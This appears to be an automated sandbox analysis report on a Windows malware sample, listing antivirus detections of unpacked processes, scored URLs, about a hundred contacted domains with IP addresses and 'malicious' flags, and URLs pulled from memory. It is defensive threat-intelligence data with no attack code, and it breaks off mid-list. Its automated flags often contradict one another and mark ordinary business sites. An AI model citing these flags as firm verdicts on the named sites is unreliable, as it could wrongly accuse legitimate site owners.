2.3.pigalicapi.exe.47712b9.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.svchost.exe.4004000.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.pigalicapi.exe.4720000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.pigalicapi.exe.4720000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.6gjnnBAbpc.exe.b30000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.pigalicapi.exe.f10000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.3.pigalicapi.exe.47404b9.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.svchost.exe.4036a00.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.pigalicapi.exe.29f04b9.7.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
15.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.2.svchost.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.svchost.exe.4004000.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.6gjnnBAbpc.exe.c40000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.3.svchost.exe.2ff0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.3.svchost.exe.55a0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.svchost.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.pigalicapi.exe.c10000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
invictus.pl	2%	Virustotal	Browse
holp-ai.com	2%	Virustotal	Browse
www.fcwcvt.org	1%	Virustotal	Browse
impexnc.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1536x864.jpg	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.19.0	0%	Avira URL Cloud	safe
https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg	0%	Avira URL Cloud	safe
http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js	0%	Avira URL Cloud	safe
https://www.stajerskagz.si/o-sgz-2/	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f1	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/	0%	Avira URL Cloud	safe
https://www.elpro.si/brand/inor/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik	0%	Avira URL Cloud	safe
http://a-domani.com/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/	0%	Avira URL Cloud	safe
https://www.elpro.si/brand/handheld/	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.0	0%	Avira URL Cloud	safe
https://www.pwd.org/	0%	Avira URL Cloud	safe
https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-768x432.jpg	0%	Avira URL Cloud	safe
http://www.valselit.com/174-appartement-a-vendre-grenoble-30514	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/	0%	Avira URL Cloud	safe
http://www.item-pr.com/qK	0%	Avira URL Cloud	safe
https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2.png	0%	Avira URL Cloud	safe
http://www.elpro.si/	0%	Avira URL Cloud	safe
http://www.credo.edu.pl/	100%	Avira URL Cloud	malware
http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni	0%	Avira URL Cloud	safe
http://www.abdg.com/	0%	Avira URL Cloud	safe
http://www.naoi-a.com/	0%	Avira URL Cloud	safe
http://sigtoa.com/	0%	Avira URL Cloud	safe
http://www.myropcb.com/services-capabilities/pcb-restoration/	0%	Avira URL Cloud	safe
https://www.aevga.com/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji	0%	Avira URL Cloud	safe
http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1	0%	Avira URL Cloud	safe
http://www.valselit.com/177-appartement-a-vendre-sigean-30378	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/	0%	Avira URL Cloud	safe
http://zugseil.com/	0%	Avira URL Cloud	safe
http://www.pwd.org/r	0%	Avira URL Cloud	safe
http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)	0%	Avira URL Cloud	safe
http://www.myropcb.com/why-use-myro/	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub	0%	Avira URL Cloud	safe
http://www.myropcb.com/services-capabilities/stencil/	0%	Avira URL Cloud	safe
http://myropcb.com/login/	0%	Avira URL Cloud	safe
http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e	0%	Avira URL Cloud	safe
http://www.winhui.cn/template/default/img/fixedimg4.png	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti	0%	Avira URL Cloud	safe
https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg	0%	Avira URL Cloud	safe
http://www.2print.com/ows	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.3	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.4	0%	Avira URL Cloud	safe
http://www.pcgrate.com	0%	Avira URL Cloud	safe
http://www.myropcb.com/why-use-myro/terms-of-service/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/	0%	Avira URL Cloud	safe
http://www.ora-ito.com/	0%	Avira URL Cloud	safe
http://umcor.am/	0%	Avira URL Cloud	safe
http://arowines.com/	0%	Avira URL Cloud	safe
http://vvsteknik.dk/	0%	Avira URL Cloud	safe
https://www.naoi-a.com/	0%	Avira URL Cloud	safe
https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk	0%	Avira URL Cloud	safe
http://www.ka-mo-me.com/S	0%	Avira URL Cloud	safe
http://www.nelipak.nl/.K	0%	Avira URL Cloud	safe
https://www.pcgrate.com	0%	Avira URL Cloud	safe
http://oozkranj.com/	0%	Avira URL Cloud	safe
http://www.mobilnic.net/upload/img/201905280859514872.png	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.40	0%	Avira URL Cloud	safe
http://vonparis.com/	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera	0%	Avira URL Cloud	safe
http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878	0%	Avira URL Cloud	safe
http://ramkome.com/	0%	Avira URL Cloud	safe
https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1170x658.png	0%	Avira URL Cloud	safe
http://www.yumgiskor.kz/	0%	Avira URL Cloud	safe
http://www.myropcb.com/wp-json/	0%	Avira URL Cloud	safe
https://layerslider.com	0%	Avira URL Cloud	safe
http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1	0%	Avira URL Cloud	safe
https://pohlfood.com/#breadcrumb	0%	Avira URL Cloud	safe
https://www.pcgrate.com/checkout/	0%	Avira URL Cloud	safe
https://pohlfood.com/privacy-policy/	0%	Avira URL Cloud	safe
http://www.wifi4all.nl/MP	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os	0%	Avira URL Cloud	safe
http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg	0%	Avira URL Cloud	safe
https://www.elpro.si/kategorija-izdelka/rotronic/	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6	0%	Avira URL Cloud	safe
http://www.elpro.si/wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.2	0%	Avira URL Cloud	safe
http://www.tc17.com/	0%	Avira URL Cloud	safe
http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
invictus.pl	193.107.88.74	true	true	2%, Virustotal, Browse	unknown
holp-ai.com	59.106.13.169	true	true	2%, Virustotal, Browse	unknown
impexnc.com	204.11.56.48	true	true	0%, Virustotal, Browse	unknown
webways.com	188.114.97.3	true	true		unknown
www.fcwcvt.org	188.114.96.3	true	false	1%, Virustotal, Browse	unknown
dayvo.com	188.114.97.3	true	true		unknown
hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com	3.130.253.23	true	false		high
enguita.net	195.5.116.23	true	false		unknown
15.204.18.132.datacname.com	15.204.18.132	true	true		unknown
dataform.co.uk	83.223.113.46	true	true		unknown
shteeble.com	185.106.129.180	true	true		unknown
evcpa.com	192.124.249.10	true	false		unknown
shittas.com	43.246.117.171	true	true		unknown
kallman.net	185.76.64.25	true	true		unknown
gphpedit.org	127.0.0.1	true	true		unknown
bible.org	104.20.54.214	true	false		high
missnue.com	104.21.234.120	true	true		unknown
jsaps.com	49.212.235.59	true	true		unknown
avse.hu	185.129.138.60	true	true		unknown
pohlfood.com	104.218.10.254	true	false		unknown
notis.ru	185.178.208.141	true	true		unknown
canasil.com	104.26.3.14	true	true		unknown
www.jenco.co.uk	172.67.208.67	true	false		unknown
www.tyrns.com	62.75.216.137	true	true		unknown
nts-web.net	49.212.235.175	true	true		unknown
willsub.com	69.89.107.122	true	false		high
ldh.la.gov	75.2.95.235	true	false		high
shesfit.com	188.114.96.3	true	true		unknown
www.vexcom.com	172.67.173.200	true	false		unknown
cpmteam.com	188.114.96.3	true	false		high
tcpoa.com	159.89.244.183	true	true		unknown
kevyt.net	104.21.2.101	true	false		unknown
www.mobilnic.net	154.203.14.100	true	false		unknown
s5w.com	192.99.226.184	true	true		unknown
www.sclover3.com	157.112.182.239	true	true		unknown
in1.smtp.messagingengine.com	66.111.4.71	true	true		unknown
paraski.org	94.130.164.242	true	true		unknown
dog-jog.net	153.122.24.177	true	true		unknown
kamptal.at	128.204.134.138	true	true		unknown
bd-style.com	107.165.223.27	true	true		unknown
ora.ecnet.jp	60.43.154.138	true	false		high
adventist.ro	49.12.155.123	true	true		unknown
www.edimart.hu	81.2.194.241	true	false		unknown
zupraha.cz	77.78.104.3	true	true		unknown
isom.org	192.124.249.14	true	true		unknown
any-s.net	108.170.12.50	true	true		unknown
muhr-soehne.de	5.189.171.125	true	true		unknown
www.railbook.net	81.171.22.4	true	false		unknown
hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com	54.161.222.85	true	false		high
oaith.ca	192.124.249.12	true	true		unknown
akr.co.id	104.20.123.68	true	true		unknown
shztm.ru	62.122.170.171	true	true		unknown
www.abdg.com	192.252.154.18	true	false		unknown
www.spanesi.com	5.196.166.214	true	false		unknown
aiolos-sa.gr	188.114.96.3	true	true		unknown
usadig.com	198.100.146.220	true	true		unknown
metaforacom.com	185.42.105.162	true	true		unknown
dhh.la.gov	52.200.51.73	true	false		high
gmail-smtp-in.l.google.com	142.251.31.26	true	false		high
fdlymca.org	192.124.249.9	true	true		unknown
smtp1.sbc.mail.am0.yahoodns.net	67.195.12.38	true	true		unknown
assideum.com	52.219.177.56	true	true		unknown
www.hyabmagneter.se	104.21.69.146	true	true		unknown
cbras.com	54.39.198.18	true	true		unknown
atbauk.org	104.21.92.170	true	true		unknown
bidroll.com	13.56.33.8	true	true		unknown
www.vazir.se	206.191.152.37	true	false		unknown
www.naoi-a.com	202.254.236.40	true	false		unknown
d2r2uj0bnofxxz.cloudfront.net	65.9.95.48	true	false		high
www.valselit.com	193.70.68.254	true	true		unknown
vvsteknik.dk	185.31.76.90	true	true		unknown
biosolve.com	151.101.130.159	true	true		unknown
karmy.com.pl	185.253.212.22	true	true		unknown
www.fe-bauer.de	3.65.101.129	true	false		unknown
smtp.mail.global.gm0.yahoodns.net	87.248.97.36	true	true		unknown
vdoherty.com	91.216.241.100	true	true		unknown
hbfuels.com	85.233.160.148	true	true		unknown
pb-games.com	173.254.28.29	true	true		unknown
mackusick.de	217.160.0.131	true	true		unknown
nekono.net	202.172.28.187	true	true		unknown
ncn.de	46.30.60.158	true	true		unknown
fnw.us	137.118.26.67	true	true		unknown
komie.com	59.106.13.181	true	true		unknown
ftmobile.com	199.34.228.78	true	true		unknown
www.x0c.com	185.53.177.50	true	false		unknown
onzcda.com	13.248.169.48	true	true		unknown
sledsport.ru	185.22.232.175	true	true		unknown
www.findbc.com	13.248.216.40	true	false		unknown
tbvlugus.nl	174.129.25.170	true	false		high
pellys.co.uk	77.72.4.226	true	true		unknown
cubodown.com	104.21.30.14	true	true		unknown
infotech.pl	79.96.32.254	true	true		unknown
semuk.com	52.128.23.153	true	true		unknown
tozzhin.com	202.94.166.30	true	true		unknown
tabbles.net	188.114.96.3	true	true		unknown
cqdgroup.com	221.132.33.88	true	true		unknown
www.muhr-soehne.de	5.189.171.125	true	true		unknown
fortknox.bm	216.177.137.32	true	true		unknown
camamat.com	104.21.235.31	true	true		unknown
lyto.net	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a-domani.com/	true	Avira URL Cloud: safe	unknown
http://www.elpro.si/	false	Avira URL Cloud: safe	unknown
http://www.credo.edu.pl/	false	Avira URL Cloud: malware	unknown
http://sigtoa.com/	false	Avira URL Cloud: safe	unknown
http://dhh.la.gov/	false		high
http://www.naoi-a.com/	false	Avira URL Cloud: safe	unknown
http://www.abdg.com/	false	Avira URL Cloud: safe	unknown
http://msl-lock.com/	false		high
http://zugseil.com/	true	Avira URL Cloud: safe	unknown
http://www.ora-ito.com/	false	Avira URL Cloud: safe	unknown
http://vvsteknik.dk/	true	Avira URL Cloud: safe	unknown
http://umcor.am/	false	Avira URL Cloud: safe	unknown
http://arowines.com/	true	Avira URL Cloud: safe	unknown
https://dataform.co.uk/wp-signup.php?new=magicomm.co.uk	true	Avira URL Cloud: safe	unknown
http://oozkranj.com/	true	Avira URL Cloud: safe	unknown
http://vonparis.com/	true	Avira URL Cloud: safe	unknown
http://ramkome.com/	true	Avira URL Cloud: safe	unknown
http://www.tc17.com/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.stajerskagz.si/o-sgz-2/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/brand/inor/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1536x864.jpg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 